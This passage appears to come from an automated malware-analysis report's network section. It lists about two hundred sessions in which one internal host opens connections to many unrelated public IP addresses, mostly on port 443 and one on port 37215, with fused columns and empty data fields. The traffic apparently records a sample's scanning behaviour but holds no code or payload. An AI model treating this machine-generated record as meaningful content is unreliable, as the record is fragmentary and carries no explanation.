                                                  14743192.168.2.1360038102.85.22.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14744192.168.2.135940299.195.223.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14745192.168.2.1343684180.78.207.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14746192.168.2.1345890216.87.79.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14747192.168.2.1333272119.74.30.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14748192.168.2.1348306100.6.179.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14749192.168.2.1350202112.4.218.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14750192.168.2.135313237.151.26.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14751192.168.2.1338150205.0.189.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14752192.168.2.1352954113.120.8.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14753192.168.2.135816239.204.74.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14754192.168.2.1334290166.2.88.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14755192.168.2.1344042152.4.174.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14756192.168.2.136076288.235.55.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14757192.168.2.135017044.39.164.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14758192.168.2.1337754148.87.205.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14759192.168.2.133549646.255.83.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14760192.168.2.1333490163.18.9.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14761192.168.2.1353702213.64.152.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14762192.168.2.1353302187.178.41.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14763192.168.2.1344758145.132.187.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14764192.168.2.1353872138.135.110.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14765192.168.2.1337298147.248.202.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14766192.168.2.1337850119.123.115.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14767192.168.2.1353406195.165.45.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14768192.168.2.1343420166.140.78.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14769192.168.2.1337726203.54.88.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14770192.168.2.1359030200.152.156.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14771192.168.2.1340496210.113.199.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14772192.168.2.1344944187.180.174.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14773192.168.2.135221899.131.91.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14774192.168.2.1339168173.46.30.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14775192.168.2.133287899.65.135.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14776192.168.2.1344644110.11.240.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14777192.168.2.1355812153.29.216.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14778192.168.2.1346912174.171.178.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14779192.168.2.1352188164.161.28.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14780192.168.2.135187064.175.211.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14781192.168.2.136082086.234.209.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14782192.168.2.1355524193.20.96.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14783192.168.2.1337974187.2.84.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14784192.168.2.134841659.91.39.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14785192.168.2.1336500106.94.179.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14786192.168.2.1335560130.42.230.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14787192.168.2.1335008108.152.175.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14788192.168.2.1344446177.241.240.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14789192.168.2.1360930201.152.32.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14790192.168.2.1346824201.225.219.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14791192.168.2.1360854111.141.201.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14792192.168.2.134083234.126.165.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14793192.168.2.1352828103.75.233.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14794192.168.2.134424871.146.176.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14795192.168.2.1346054211.85.131.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14796192.168.2.1349630112.7.186.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14797192.168.2.1345324210.241.4.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14798192.168.2.1334438119.51.224.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14799192.168.2.1333896125.235.20.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14800192.168.2.134938247.162.151.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14801192.168.2.133747246.221.95.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14802192.168.2.133992014.157.128.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14803192.168.2.1357260221.175.66.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14804192.168.2.1341062211.70.133.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14805192.168.2.134378877.225.93.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14806192.168.2.1346570163.152.97.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14807192.168.2.1346262213.36.95.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14808192.168.2.135131692.160.104.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14809192.168.2.1343788204.109.223.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14810192.168.2.1335860101.19.145.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14811192.168.2.134140086.10.85.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14812192.168.2.133786272.21.170.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14813192.168.2.1352994167.176.174.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14814192.168.2.134579688.10.63.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14815192.168.2.135025424.86.101.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14816192.168.2.1353212146.72.136.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14817192.168.2.1335156199.5.36.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14818192.168.2.135636459.120.215.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14819192.168.2.1353798120.61.72.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14820192.168.2.133990035.22.205.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14821192.168.2.1335714178.206.105.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14822192.168.2.1356186179.177.154.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14823192.168.2.135842058.141.77.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14824192.168.2.1351388107.244.154.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14825192.168.2.1335154125.237.215.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14826192.168.2.1338306105.128.209.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14827192.168.2.133618276.83.1.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14828192.168.2.1336496171.98.18.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14829192.168.2.136042638.104.50.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14830192.168.2.1338964199.136.133.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14831192.168.2.1352336117.163.54.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14832192.168.2.1355196147.33.241.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14833192.168.2.135043080.214.85.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14834192.168.2.1354772118.153.46.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14835192.168.2.1348532116.208.48.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14836192.168.2.1341396148.84.55.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14837192.168.2.134468447.140.183.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14838192.168.2.1343374151.178.176.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14839192.168.2.133861014.254.231.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14840192.168.2.1340536195.225.138.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14841192.168.2.1351626207.63.117.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14842192.168.2.1359940132.14.77.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14843192.168.2.1335788108.203.84.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14844192.168.2.1360330182.255.99.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14845192.168.2.1360490137.254.206.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14846192.168.2.1336760103.133.240.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14847192.168.2.136053252.184.227.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14848192.168.2.135943437.204.43.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14849192.168.2.1352722130.30.51.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14850192.168.2.133627087.135.169.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14851192.168.2.1354344172.167.68.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14852192.168.2.1334420221.198.185.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14853192.168.2.1343312162.54.193.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14854192.168.2.1356438195.231.53.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14855192.168.2.134842686.8.215.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14856192.168.2.1355778201.179.35.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14857192.168.2.1346256155.86.175.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14858192.168.2.135520649.163.223.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14859192.168.2.1342674174.127.195.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14860192.168.2.135776684.161.92.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14861192.168.2.1353684218.233.195.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14862192.168.2.1333980184.55.225.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14863192.168.2.134711419.159.125.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14864192.168.2.1359978124.104.232.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14865192.168.2.133330293.122.146.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14866192.168.2.134914498.27.103.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14867192.168.2.1349524174.68.90.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14868192.168.2.1357966147.219.249.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14869192.168.2.1335732166.77.32.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14870192.168.2.1359696213.45.241.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14871192.168.2.134336281.165.231.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14872192.168.2.1355838147.177.157.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14873192.168.2.1357156107.53.220.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14874192.168.2.135764461.103.79.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14875192.168.2.134932863.97.218.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14876192.168.2.1349904103.28.53.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14877192.168.2.1339288122.77.52.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14878192.168.2.136081044.177.95.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14879192.168.2.135245875.184.142.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14880192.168.2.1352178178.113.195.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14881192.168.2.1358490195.117.115.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14882192.168.2.1358030110.172.90.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14883192.168.2.1352348122.160.180.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14884192.168.2.1352508107.113.170.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14885192.168.2.134216492.237.169.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14886192.168.2.134593052.178.108.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14887192.168.2.136041627.192.67.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14888192.168.2.134075271.160.139.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14889192.168.2.1339280167.220.195.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14890192.168.2.1346460198.8.54.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14891192.168.2.1337448178.202.178.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14892192.168.2.1342426101.28.252.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14893192.168.2.1340490139.95.182.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14894192.168.2.135334845.22.59.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14895192.168.2.135322087.237.105.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14896192.168.2.1344190121.53.91.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14897192.168.2.133370698.207.37.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14898192.168.2.133582419.46.25.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14899192.168.2.135459097.102.177.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14900192.168.2.136021260.237.215.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14901192.168.2.1352654222.105.8.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14902192.168.2.1342836138.190.188.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14903192.168.2.1341176146.95.23.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14904192.168.2.133615250.147.160.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14905192.168.2.1359506159.233.230.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14906192.168.2.133495439.90.227.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14907192.168.2.1359048191.101.234.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14908192.168.2.1333694171.21.147.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14909192.168.2.1360112173.245.35.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14910192.168.2.1356368213.146.54.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14911192.168.2.133551689.166.103.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14912192.168.2.1347474178.51.45.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14913192.168.2.1349368126.126.103.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14914192.168.2.133512453.197.5.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14915192.168.2.1344176208.204.191.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14916192.168.2.1355148132.132.115.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14917192.168.2.133703882.238.167.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14918192.168.2.1360734191.169.241.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14919192.168.2.1341746141.7.123.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14920192.168.2.1354524129.204.248.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14921192.168.2.135467459.2.27.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14922192.168.2.1336196189.120.203.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14923192.168.2.134719461.255.84.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14924192.168.2.1342434203.221.140.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14925192.168.2.1358772116.63.22.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14926192.168.2.1341068217.88.140.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14927192.168.2.1333392184.169.227.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14928192.168.2.1354252112.69.164.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14929192.168.2.135703619.182.255.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14930192.168.2.133677878.182.62.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14931192.168.2.133390463.236.222.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14932192.168.2.1360444106.174.130.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14933192.168.2.133801437.18.100.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14934192.168.2.13347501.41.165.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14935192.168.2.133859227.101.126.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14936192.168.2.1350880136.193.227.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14937192.168.2.1357622192.130.87.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14938192.168.2.1360436208.246.219.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14939192.168.2.1355296101.122.104.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14940192.168.2.1334522137.126.126.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14941192.168.2.1352838185.250.147.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14942192.168.2.1346516175.252.79.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14943192.168.2.134785227.226.192.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14944192.168.2.134409238.116.176.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14945192.168.2.134564476.239.138.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14946192.168.2.1340294133.249.179.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14947192.168.2.1341060120.130.235.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14948192.168.2.1335754171.133.86.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14949192.168.2.135081680.213.43.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14950192.168.2.1342454117.62.122.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14951192.168.2.1346518186.123.143.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14952192.168.2.135689284.200.224.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14953192.168.2.136016090.242.91.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14954192.168.2.1341270106.23.133.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
